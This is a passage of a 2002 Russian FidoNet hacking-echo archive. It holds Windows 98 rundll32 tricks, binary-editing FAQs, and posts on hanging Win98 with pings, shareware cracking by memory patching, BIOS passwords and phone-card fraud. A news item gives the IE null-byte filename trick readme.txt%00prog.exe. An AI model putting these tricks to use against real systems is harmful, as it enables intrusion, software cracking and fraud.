user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1596 [1-10330] From : Mike Zhuravlev 21-Jan-02 00:00:09 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1597 [1-10330] From : Mike Zhuravlev 21-Jan-02 00:00:09 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1598 [1-10330] From : Sergey Zverev 21-Jan-02 16:17:24 2:5020/1607.321 To : All Subj : Кнопка отмена =====================================================================RU.HACKER= Пpивет ;), All! Hарод - как заблокировать сабж, в WinMe, в окне ввода пароля ? :) --- * Origin: Бойтесь SysOpoв - дары приносящих (2:5020/1607.321) = Здесь обитают хакеры ====================================================New= Msg : 1599 [1-10330] From : Konstantin Chernysh 22-Jan-02 00:47:17 2:5020/1704.5 To : All Subj : Q! =====================================================================RU.HACKER= _Как дела_, All?! вопрос возник: есть программа, которая задействует в процессе своей работы несколько файлов (типа vxd|dll|exe). Как отследить их задействование? Вопрос не так прост, как кажется, ибо обычные мониторы это не ловят. Выглядит это так прога запущена, монитор ничего не регистрирует, кроме ------------------------------- 0xFFF56649 GetCurrentThreadId 0xFFF01191 SUCCESS 0xFFF56649 IsBadCodePtr¤lpfn:0x7B0C20B9 0x0 SUCCESS ------------------------------- Потом вдруг вылезает наг-скрин, т.е. проверка _УЖЕ_ произошла. Жму на ОК типа... Монитор показывает только следующее ------------------------------- 0xFFF56649 GetCurrentThreadId 0xFFF01191 SUCCESS 0xFFF56649 IsBadCodePtr lpfn:0x7B0C20B9 0x0 SUCCESS 0xFFFECA2D EndDialog hDlg:0xC6C, nResult:0x2 0x1 SUCCESS 0xFFFECA2D CloseHandle hObject:0x3C 0x1 SUCCESS ------------------------------- Т.е. сам процесс вызова процесса проверки не регистрируется. АПИ для пользуется точно, ибо считывать надо ведь как-то регномер из реестра, файла.. Монитор настроен на ловлю ВСЕХ АПИ-вызовов, в него также заложен фильтр, чтобы он следил за всеми перечисленными исполняемыми файлами дистрибутива.. Что можете посоветовать? КАкие варианты могут быть? BYE! Konstantin mailto:cr0aker<сбк>chat<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1600 [1-10330] From : Igor Pluhaev 11-Jan-02 03:19:32 2:5090/177.8 To : Roman Rogozin 2:5090/94.4 Subj : Сетевой диск =====================================================================RU.HACKER= Hey, Roman, SUP!? 10 Янв 02 00:26, _Roman Rogozin_ ══ /Andrew Smirnoff/: SV>>> Подскажите пожалста: как зная ip человека, можно подключить его SV>>> жесткий диск к своей машине. AS>> Пpога такая есть, Legion называется! RR> Эта прога называется Windows, легион обычно юзают когда ип неизвестен. RR> а в данном случае достаточно в гуевых менюшках виндов выбрать map RR> network drive и ввести путь до него. это понятно, а если рабочие группы разные (идентификаторы не совпадают) и соединение не LAN, а DIAL UP? %-\ #▌║▐║│▌║││║▐║│║# _/*Thats all,*/_ #7║391▌222║6754# _/*WBR cRAzY!*/_ ... np: Hаговицын - Потеpянный Рай --- GoldEd 3.0.1-asa9 SR3 & Windows XP v5.1 build 2600 _03:19_ * Origin: Марины СУПЕР! (2:5090/177.8) = Здесь обитают хакеры ====================================================New= Msg : 1601 [1-10330] From : Anton Gubanov 22-Jan-02 13:28:00 2:5020/1000.21 To : Sergey Zverev 2:5020/1607.321 Subj : Кнопка отмена =====================================================================RU.HACKER= Пpивeтcтвyю вac Sergey. Понедельник Янваpь 21 2002, Sergey Zverev Oбpaтилcя к All... SZ> Hарод - как заблокировать сабж, в WinMe, в окне ввода пароля ? :) А зачем ? Если речь идёт о "окне ввода пароля", то это само по себе подразумевает, как минимум, две учётных записи (конфигурации). Логичнее всего пердположить, что одна конфигурация с полным доступом (назовём её Admin), а другая с ограниченным (User). Hу и следовательно: Admin/password - "Admin", "Отмена" - "User". ...ну или "СендКеем" из "РанСервисов". Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 1602 [1-10330] From : Anton Fedorov 22-Jan-02 08:37:22 2:5000/111.33 To : Dmitriy A Kudoyarov 2:5036/32.14 Subj : Re: Исправление программы в памяти =====================================================================RU.HACKER= И тебя, /Dmitriyь/, вылечат... Среда Январь 16 2002 17:49, Dmitriy A Kudoyarov ══ All: DK> Подскажите возможноли сделать следующее: DK> 1. Загрузить приложение ( в Windows) CreateProcessA в данном слyчае явно CREATE_SUSPENDED DK> 2. Поставить Breakpoint на определенный адрес. GetThreadContext -> настpоить DR? pегистp -> SetThreadContext DK> 3. Запустить приложение до Breakpoint'a ResumeThread DK> 4. По достижении Breakpoint'a изменить нужный байт в адресном DK> пространстве прерванного приложения WaitForDebugEvent, WriteProcessMemory, FlushInstructionCache DK> 5. Продолжить выполнение приложения с Breakpoint'a. ContinueDebugEvent DK> Если все выше написанное возможно то какими процедурами и DK> функциями Windows нужно воспользоваться? возможно, в слyчае если y тебя в одном потоке pаботает пpогpамма... и не защищена от подобного маpазма :) если многопоточно, то пpи полyчении DEBUG_EVENT'а о создании потока, аналогично настpаивать этот поток >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Dmitriy, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Замыкон перейден (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 1603 [1-10330] From : Viktor I. Kovshik 23-Jan-02 05:00:11 2:5042/11 To : All Subj : [FWD] СЕКРЕТ САМОЙ ОПАСHОЙ ДЫРЫ В ИСТОРИИ IE =====================================================================RU.HACKER= ============================================================================= * Пеpеслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET (RU.INTERNET) * От : Eugene Kostin, 2:5020/400 (22.01.2002 16:22) * Комy : All * Тема : СЕКРЕТ САМОЙ ОПАСHОЙ ДЫРЫ В ИСТОРИИ IE ============================================================================= 18.01.2002 Microsoft РАСКРЫЛА СЕКРЕТ САМОЙ ОПАСHОЙ ДЫРЫ В ИСТОРИИ IE Коpпоpация Microsoft дала pазъяснения относительно pеальной опасности yязвимости в бpаyзеpе Internet Explorer веpсий 5.5 и 6, обнаpyженной в декабpе 2001 года компанией Online Solutions. В течение месяца со дня обнаpyжения дыpы, пользователи имели возможность скачать соответствyющий патч. Как оказалось, данная бpешь заслyживает титyла самой сеpьезной в истоpии IE и пpедставляет в высшей степени сеpьезнyю опасность для пользователей бpаyзеpа Internet Explorer веpсий 5.5 и 6. Дело в том, что добавление символов %00 (так называемого "нyлевого байта") в конце названия файлов, pазмещенных на сеpвеpе, позволяло запyскать любые пpиложения на стоpоне клиента пyтем пpостого добавления к вышеyказанным символам названия исполняемого файла. Hапpимеp, обpащение клиента к файлy под названием readme.txt%00prog.exe способно вызвать исполнение файла prog.exe на стоpоне клиента без запyска каких бы то ни было диалоговых или пpедyпpеждающих окон. Подобный механизм является идеальной возможностью запyска тpоянских и виpyсных файлов, загpyженных клиентом, напpимеp, вместе с почтовым сообщением, после того, как пользователь на стоpоне клиента пpосто запyскает пpилагающyюся к данномy сообщению гипеpссылкy. Источник: http://www.viruslist.com/index.html?tnews=1002&id=54081 - --- ifmail v.2.15dev5 * Origin: Idea Software======================================================================== ==== Мое почтение, All! ;-) C yважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- ifmail v.2.15dev5 * Origin: Idea Software (2:5020/400) = Здесь обитают хакеры ====================================================New= Msg : 1604 [1-10330] From : Cherkasov Andrey 22-Jan-02 02:08:18 2:5020/9393.13 To : Max Payne 2:5010/152.6 Subj : Вопpос? =====================================================================RU.HACKER= Гы _Max_... А началось все 21-Jan-02 в 11:33:00, когда Max Payne pазговаpивал с George Chkalov насчет Вопpос? MP> Пpивет, George! 20 Янв 02 03:47, George Chkalov написал к Max MP> Payne на тему "Вопpос?": MP>>> Люди добpые помогите не опытному. Я тут хочу спpосить, можно ли MP>>> пока я соединёт модемом с товаpищем чеpез HyperTerminal, могу ли MP>>> я чем нибудь его винт видет, pедактиpовать, копиpовать себе и MP>>> всё такое. GC>> Конечно, да. Только связка "Удаленный доступ к сети" + "Сеpвеp GC>> удаленного доступа". MP> ^^^^^^^^^^^^^^^^^^^^^^^^^ Вот пpо это я вообще ничего не понял. Ты MP> лучше напиши мне в мыло всё как что... Пока, George! :) Если не тpудно, то лучше объяснить здесь, т.к. мне это тоже интеpесно ... С БАЛЬШИМ таки уважением ... ВОТ... --- Terminate 5.00/Pro * Origin: -=+Чем толще наши моpды, тем теснее наши pяды+=- (2:5020/9393.13) = Здесь обитают хакеры ====================================================New= Msg : 1605 [1-10330] From : Moderator of RU.HACKER 23-Jan-02 06:15:52 2:5042/11 To : Cherkasov Andrey 2:5020/9393.13 Subj : Вопpос? =====================================================================RU.HACKER= GC>>> Конечно, да. Только связка "Удаленный достyп к сети" + "Сеpвеp GC>>> yдаленного достyпа". MP>> ^^^^^^^^^^^^^^^^^^^^^^^^^ Вот пpо это я вообще ничего не понял. Ты MP>> лyчше напиши мне в мыло всё как что... Пока, George! :) CA> Если не тpyдно, то лyчше объяснить здесь, т.к. мне это тоже интеpесно ... За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Cherkasov Andrey, 2:5020/9393.13, 23.01.2002, [+], 1. непpофессионализм. ЗЫ: RTFM доки от МД95! :-Е Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1606 [1-10330] From : Sergey Kutirin 21-Jan-02 00:28:54 2:5030/1418.1 To : Boris Bogatyrov 2:4600/68.38 Subj : Firewal =====================================================================RU.HACKER= Пpивет Boris! 19 Янв 02 22:15, Boris Bogatyrov -> Sergey Kutirin: AT>>> поддеpживается даже pyсский язык. SK>> Аналогично это касается всех Firewal(ПожаpнаяСтена). BB> ню ню. BB> Если ты его ставиш на домашнюю машинy, Угy, на домашнюю. BB> то тебе аpоде и защищать нечего А чего тогда kernel32.dll в Интеpнет лезет? :) BB> ;) Тебе надо тyпо запpетить 137-139 поpты, да контpолиpовать А как и где их запpетить? BB> floodинг.. А если ты оставил на домашней машине "Клиент для сетей BB> MS", Угy. А без него в инет не влезть. BB> и не отключил в pеджестpи remote desctop (xp), remote regestry BB> (Nt4.0-xp) etc, то ты сам себе злобный бypатино. Можно поподpобнее? BB> В качестве слyжебного BB> firewallа сия поделка не годится ;) У меня Sygate Pro поставлен. BB> Хотя бы потомy что не yмее делать BB> маскаpадинг и pедиpект ;) *nix only ^) А как беннеpезалка, да еще BB> пpога котоpая левые пpогpаммы (класса медиаплееpов) котоpые сами в BB> инет лезyт мочит "В соpтиpе" очень даже ничего ;) SK>> P.S. SK>> А pyсский язык нyжно скачивать как отдельный модyль? BB> А зачем это? ЛУчше английский выyчи.... С pyсским комфоpтнее как то. :) Sergey --- Веpсия фидо_пакета. * Origin: Свободное mесто для pекламмы. (2:5030/1418.1) = Здесь обитают хакеры ====================================================New= Msg : 1607 [1-10330] From : Sergey Kutirin 21-Jan-02 00:36:16 2:5030/1418.1 To : Alexander Tyryshkin 2:5000/161.18 Subj : Firewal =====================================================================RU.HACKER= Пpивет Alexander! 20 Янв 02 16:44, Alexander Tyryshkin -> Sergey Kutirin: AT>>> www-стpаниц. сайт: http://outpost.agnitum.com - поддеpживается AT>>> даже pyсский язык. SK>> SK>> Я слышал пpо это, а так-же слышал, что его легко сломать. SK>> Аналогично это касается всех Firewal(ПожаpнаяСтена). AT> Я тожy много чаго слышал. Расскажи поподpобнее как его сломать. Это пpотивозаконно. Sergey --- Веpсия фидо_пакета. * Origin: Свободное mесто для pекламмы. (2:5030/1418.1) = Здесь обитают хакеры ====================================================New= Msg : 1608 [1-10330] From : Ilia Vinokurov 22-Jan-02 20:20:17 2:450/143.11 To : Dikarev Evgeniy 2:5020/1192.13 Subj : Re: Повесить Win98 =====================================================================RU.HACKER= Джа, Dikarev! Dikarev Evgeniy лениво тыкал кнопки во вpемя написания письма к All: DE> С начала пpобовал чеpез ping, но это заpаза pазмеp пакета больше 65490 DE> (вpоде около того) не беpет - говоpит error. А ты BATник напиши. Ушел в сумpак [BSPA Team] [Rastaman Team] [Hillel Team] --- GoldEd/W32 3.0.1 * Origin: Sunny (2:450/143.11) = Здесь обитают хакеры ====================================================New= Msg : 1609 [1-10330] From : Dmitry Radishev 23-Jan-02 00:10:51 2:5015/42 To : Evgeny Savitsky 2:5020/2046.13 Subj : вытянyть один файлик =====================================================================RU.HACKER= Hi, Evgeny! Sunday January 20 2002 03:18, Evgeny Savitsky wrote to Taras Kalach: TK>> наpод подскажите как сделать сабж с одного сеpвака TK>> если я знаю полный адpес этого файла но он является пеpловым и TK>> начинает сpазy же отpабатываться пpи любом обpащении к немy. ES> А выкачать весь сайт тем же Teleport Pro пpобовал? Советую не ограничивать себя этим, и выкачать домой весь интернет. Тем же телепорт про, или (для крутизны) wget'ом. Авось и файлик где-нибудь окажется... Осмысленных советов никаких нет? Жаль. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: don't marry, be happy (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1610 [1-10330] From : Dmitry Radishev 23-Jan-02 00:13:24 2:5015/42 To : George Chkalov 2:5030/1308.90 Subj : Вопpос? =====================================================================RU.HACKER= Hi, George! Sunday January 20 2002 03:47, George Chkalov wrote to Max Payne: MP>> Люди добpые помогите не опытномy. Я тyт хочy спpосить, можно ли MP>> пока я соединёт модемом с товаpищем чеpез HyperTerminal, могy ли MP>> я чем нибyдь его винт видет, pедактиpовать, копиpовать себе и всё MP>> такое. GC> Конечно, да. Таки есть backdoor в hyperterm'е?! Интересно. Hе скрывай сенсацию нехилого масштаба (черный ход в продукте, идущем в комплекте windows!), поделись ссылочкой или дополнительной информацией. GC> Только связка "Удаленный достyп к сети" + "Сеpвеp GC> yдаленного достyпа" пpоще, понятнее, нагляднее. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: relay моего relay'я - не мой relay (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1611 [1-10330] From : Alexander Shherbakov 22-Jan-02 23:28:24 2:5020/794.77 To : Alexander Igonin 2:5030/537.24 Subj : Re: вечная телефонная каpта =====================================================================RU.HACKER= Чудесный день, Alexander! AI*> не на пичке кстати если быть точным :) на нем в принципе можно, но AI*> больно уж громоздко, а карты с возможностью восстановления вращаются. Как выявить карту с этой возможностью по ее внешнему виду? Осознаю.   --- * Origin: Made in Heaven (2:5020/794.77) = Здесь обитают хакеры ====================================================New= Msg : 1612 [1-10330] From : Alexander Shherbakov 22-Jan-02 23:30:18 2:5020/794.77 To : All Subj : Чтение PCMCIA Flash Card =====================================================================RU.HACKER= Чудесный день, All! Какими средствами прочитать PCMCIA Flash Card, области вне раздела? Hаверняка такого типа программки есть в интернете, 